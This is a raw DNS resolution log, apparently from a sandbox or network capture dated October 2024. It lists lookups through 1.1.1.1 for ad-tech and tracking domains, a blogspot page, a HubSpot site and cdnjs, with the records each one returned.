                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.344846010 CEST1.1.1.1192.168.2.70xd655No error (0)rc.rlcdn.comrc-ext-geo.rlcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.345669985 CEST1.1.1.1192.168.2.70x63f7No error (0)cdn-tc.33across.comcdn-tc.33across.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.346218109 CEST1.1.1.1192.168.2.70x4dbbNo error (0)cdn-tc.33across.comcdn-tc.33across.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.357215881 CEST1.1.1.1192.168.2.70x381No error (0)rc.rlcdn.comrc-ext-geo.rlcdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.357215881 CEST1.1.1.1192.168.2.70x381No error (0)rc-ext-geo.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.376769066 CEST1.1.1.1192.168.2.70xa820No error (0)e.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.376769066 CEST1.1.1.1192.168.2.70xa820No error (0)e.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.377167940 CEST1.1.1.1192.168.2.70xfc5bNo error (0)e.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.381958008 CEST1.1.1.1192.168.2.70x2d8fNo error (0)t.dtscout.com141.101.120.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.381958008 CEST1.1.1.1192.168.2.70x2d8fNo error (0)t.dtscout.com141.101.120.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.382492065 CEST1.1.1.1192.168.2.70x962No error (0)t.dtscout.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.386028051 CEST1.1.1.1192.168.2.70x2063No error (0)cdn.tynt.comcdn.tynt.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.386205912 CEST1.1.1.1192.168.2.70x76b9No error (0)cdn.tynt.comcdn.tynt.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.388465881 CEST1.1.1.1192.168.2.70xbb81No error (0)pd.sharethis.comthirdparty-logserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.389588118 CEST1.1.1.1192.168.2.70x8d01No error (0)pxdrop.lijit.coma24365-c026.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.391540051 CEST1.1.1.1192.168.2.70x1a24No error (0)pxdrop.lijit.coma24365-c026.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.398785114 CEST1.1.1.1192.168.2.70x2733No error (0)pd.sharethis.comthirdparty-logserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.398785114 CEST1.1.1.1192.168.2.70x2733No error (0)thirdparty-logserver-lb.global.unified-prod.sharethis.net35.156.11.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.398785114 CEST1.1.1.1192.168.2.70x2733No error (0)thirdparty-logserver-lb.global.unified-prod.sharethis.net3.74.183.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.398785114 CEST1.1.1.1192.168.2.70x2733No error (0)thirdparty-logserver-lb.global.unified-prod.sharethis.net52.59.151.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.406474113 CEST1.1.1.1192.168.2.70x18c0No error (0)ic.tynt.com67.202.105.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.406474113 CEST1.1.1.1192.168.2.70x18c0No error (0)ic.tynt.com67.202.105.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.596251011 CEST1.1.1.1192.168.2.70xb72bNo error (0)t.sharethis.comcert1.a1.atm.aqfer.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.596445084 CEST1.1.1.1192.168.2.70x4808No error (0)t.sharethis.comcert1.a1.atm.aqfer.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.770337105 CEST1.1.1.1192.168.2.70x97cNo error (0)de.tynt.com67.202.105.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.770337105 CEST1.1.1.1192.168.2.70x97cNo error (0)de.tynt.com67.202.105.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.807763100 CEST1.1.1.1192.168.2.70x2afeNo error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.807763100 CEST1.1.1.1192.168.2.70x2afeNo error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.807763100 CEST1.1.1.1192.168.2.70x2afeNo error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.807763100 CEST1.1.1.1192.168.2.70x2afeNo error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.933304071 CEST1.1.1.1192.168.2.70x6d0dNo error (0)t.sharethis.comcert1.a1.atm.aqfer.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.941696882 CEST1.1.1.1192.168.2.70x2321No error (0)t.sharethis.comcert1.a1.atm.aqfer.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.945031881 CEST1.1.1.1192.168.2.70xbf34No error (0)t.dtscdn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.945080042 CEST1.1.1.1192.168.2.70xaa2dNo error (0)t.dtscdn.com172.67.74.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.945080042 CEST1.1.1.1192.168.2.70xaa2dNo error (0)t.dtscdn.com104.26.12.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.945080042 CEST1.1.1.1192.168.2.70xaa2dNo error (0)t.dtscdn.com104.26.13.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.988347054 CEST1.1.1.1192.168.2.70x8a5cNo error (0)tags.crwdcntrl.net65.9.66.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.988347054 CEST1.1.1.1192.168.2.70x8a5cNo error (0)tags.crwdcntrl.net65.9.66.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.988347054 CEST1.1.1.1192.168.2.70x8a5cNo error (0)tags.crwdcntrl.net65.9.66.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:37.988347054 CEST1.1.1.1192.168.2.70x8a5cNo error (0)tags.crwdcntrl.net65.9.66.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.050781012 CEST1.1.1.1192.168.2.70x536No error (0)pippio.com107.178.254.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.302205086 CEST1.1.1.1192.168.2.70xf260No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.302205086 CEST1.1.1.1192.168.2.70xf260No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.317826986 CEST1.1.1.1192.168.2.70xc7bfNo error (0)tags.crwdcntrl.net65.9.66.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.317826986 CEST1.1.1.1192.168.2.70xc7bfNo error (0)tags.crwdcntrl.net65.9.66.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.317826986 CEST1.1.1.1192.168.2.70xc7bfNo error (0)tags.crwdcntrl.net65.9.66.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.317826986 CEST1.1.1.1192.168.2.70xc7bfNo error (0)tags.crwdcntrl.net65.9.66.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.677171946 CEST1.1.1.1192.168.2.70x5832No error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.677171946 CEST1.1.1.1192.168.2.70x5832No error (0)www3.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.677521944 CEST1.1.1.1192.168.2.70x86c6No error (0)fundingchoicesmessages.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.693474054 CEST1.1.1.1192.168.2.70xcc87No error (0)pippio.com107.178.254.65A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.870325089 CEST1.1.1.1192.168.2.70xcc60No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:38.870325089 CEST1.1.1.1192.168.2.70xcc60No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.495439053 CEST1.1.1.1192.168.2.70x1652Server failure (2)p.adsymptotic.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.499058008 CEST1.1.1.1192.168.2.70xfcd1Server failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.503974915 CEST1.1.1.1192.168.2.70x6d73Server failure (2)p.adsymptotic.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.506381035 CEST1.1.1.1192.168.2.70x293aServer failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.514596939 CEST1.1.1.1192.168.2.70xc741Server failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.569744110 CEST1.1.1.1192.168.2.70xc074No error (0)idsync.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.602847099 CEST1.1.1.1192.168.2.70x371aServer failure (2)p.adsymptotic.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.603137970 CEST1.1.1.1192.168.2.70xf1e1Server failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.612874031 CEST1.1.1.1192.168.2.70xdc6aServer failure (2)p.adsymptotic.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.620660067 CEST1.1.1.1192.168.2.70x7f28Server failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net54.77.205.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net54.229.139.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net34.255.228.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net54.72.167.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net99.80.212.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net34.255.22.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net63.35.31.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:39.624301910 CEST1.1.1.1192.168.2.70xe2eeNo error (0)bcp.crwdcntrl.net52.214.114.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.459060907 CEST1.1.1.1192.168.2.70xfc2cNo error (0)idsync.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.737315893 CEST1.1.1.1192.168.2.70x98d1No error (0)match.adsrvr.org52.223.40.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.737315893 CEST1.1.1.1192.168.2.70x98d1No error (0)match.adsrvr.org15.197.193.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.737315893 CEST1.1.1.1192.168.2.70x98d1No error (0)match.adsrvr.org3.33.220.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.737315893 CEST1.1.1.1192.168.2.70x98d1No error (0)match.adsrvr.org35.71.131.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.742974043 CEST1.1.1.1192.168.2.70xebdaNo error (0)idsync.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.744205952 CEST1.1.1.1192.168.2.70x16a6No error (0)ps.eyeota.net3.120.214.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.745137930 CEST1.1.1.1192.168.2.70x40bdNo error (0)ml314.com34.117.77.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.771311998 CEST1.1.1.1192.168.2.70xf78bNo error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:40.771475077 CEST1.1.1.1192.168.2.70xece5No error (0)tags.bluekai.comtags.bluekai.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net63.35.31.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net54.77.205.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net54.72.167.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net34.255.228.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net34.255.22.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net99.80.212.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net52.214.114.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.083695889 CEST1.1.1.1192.168.2.70xa222No error (0)bcp.crwdcntrl.net54.229.139.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.462095976 CEST1.1.1.1192.168.2.70xa545No error (0)sync.sharethis.comhttplogserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.462095976 CEST1.1.1.1192.168.2.70xa545No error (0)httplogserver-lb.global.unified-prod.sharethis.net18.195.70.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.462095976 CEST1.1.1.1192.168.2.70xa545No error (0)httplogserver-lb.global.unified-prod.sharethis.net3.77.1.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.462095976 CEST1.1.1.1192.168.2.70xa545No error (0)httplogserver-lb.global.unified-prod.sharethis.net35.156.10.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:41.463522911 CEST1.1.1.1192.168.2.70xd193No error (0)sync.sharethis.comhttplogserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.639250040 CEST1.1.1.1192.168.2.70x966dNo error (0)sync.sharethis.comhttplogserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.639250040 CEST1.1.1.1192.168.2.70x966dNo error (0)httplogserver-lb.global.unified-prod.sharethis.net18.195.70.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.639250040 CEST1.1.1.1192.168.2.70x966dNo error (0)httplogserver-lb.global.unified-prod.sharethis.net3.77.1.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.639250040 CEST1.1.1.1192.168.2.70x966dNo error (0)httplogserver-lb.global.unified-prod.sharethis.net35.156.10.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.639725924 CEST1.1.1.1192.168.2.70x7a4cNo error (0)sync.sharethis.comhttplogserver-lb.global.unified-prod.sharethis.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:42.655554056 CEST1.1.1.1192.168.2.70xf205No error (0)ml314.com34.117.77.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:43.453860044 CEST1.1.1.1192.168.2.70xe201No error (0)my7recovery.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:43.453860044 CEST1.1.1.1192.168.2.70xe201No error (0)blogspot.l.googleusercontent.com216.58.206.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:43.503221035 CEST1.1.1.1192.168.2.70x2812No error (0)my7recovery.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.619263887 CEST1.1.1.1192.168.2.70xa134No error (0)googleads.g.doubleclick.net216.58.212.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.619508982 CEST1.1.1.1192.168.2.70x7b9No error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.668401957 CEST1.1.1.1192.168.2.70x3a09No error (0)get.managedmethods.com6834707.group7.sites.hubspot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.668401957 CEST1.1.1.1192.168.2.70x3a09No error (0)6834707.group7.sites.hubspot.netgroup7.sites.hscoscdn00.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.668401957 CEST1.1.1.1192.168.2.70x3a09No error (0)group7.sites.hscoscdn00.net199.60.103.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.668401957 CEST1.1.1.1192.168.2.70x3a09No error (0)group7.sites.hscoscdn00.net199.60.103.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.683679104 CEST1.1.1.1192.168.2.70x1ce4No error (0)get.managedmethods.com6834707.group7.sites.hubspot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.683679104 CEST1.1.1.1192.168.2.70x1ce4No error (0)6834707.group7.sites.hubspot.netgroup7.sites.hscoscdn00.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:44.683679104 CEST1.1.1.1192.168.2.70x1ce4No error (0)group7.sites.hscoscdn00.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.045192957 CEST1.1.1.1192.168.2.70x4fa7No error (0)my7recovery.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.045531988 CEST1.1.1.1192.168.2.70x585fNo error (0)my7recovery.blogspot.comblogspot.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.045531988 CEST1.1.1.1192.168.2.70x585fNo error (0)blogspot.l.googleusercontent.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net63.35.31.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net54.77.205.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net34.255.228.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net54.72.167.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net54.229.139.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net99.80.212.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net34.255.22.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.262727976 CEST1.1.1.1192.168.2.70x6755No error (0)bcp.crwdcntrl.net52.214.114.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.632134914 CEST1.1.1.1192.168.2.70xf940No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.632134914 CEST1.1.1.1192.168.2.70xf940No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.632637978 CEST1.1.1.1192.168.2.70x1587No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.662060976 CEST1.1.1.1192.168.2.70x4efcNo error (0)7052064.fs1.hubspotusercontent-na1.net104.18.41.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.662060976 CEST1.1.1.1192.168.2.70x4efcNo error (0)7052064.fs1.hubspotusercontent-na1.net172.64.146.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:45.662949085 CEST1.1.1.1192.168.2.70x8a70No error (0)7052064.fs1.hubspotusercontent-na1.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.054112911 CEST1.1.1.1192.168.2.70xf1a9No error (0)get.managedmethods.com6834707.group7.sites.hubspot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.054112911 CEST1.1.1.1192.168.2.70xf1a9No error (0)6834707.group7.sites.hubspot.netgroup7.sites.hscoscdn00.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.054112911 CEST1.1.1.1192.168.2.70xf1a9No error (0)group7.sites.hscoscdn00.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.058623075 CEST1.1.1.1192.168.2.70xe1baNo error (0)get.managedmethods.com6834707.group7.sites.hubspot.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.058623075 CEST1.1.1.1192.168.2.70xe1baNo error (0)6834707.group7.sites.hubspot.netgroup7.sites.hscoscdn00.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.058623075 CEST1.1.1.1192.168.2.70xe1baNo error (0)group7.sites.hscoscdn00.net199.60.103.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.058623075 CEST1.1.1.1192.168.2.70xe1baNo error (0)group7.sites.hscoscdn00.net199.60.103.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.436363935 CEST1.1.1.1192.168.2.70x30cfNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.436363935 CEST1.1.1.1192.168.2.70x30cfNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:46.436693907 CEST1.1.1.1192.168.2.70xe0b2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
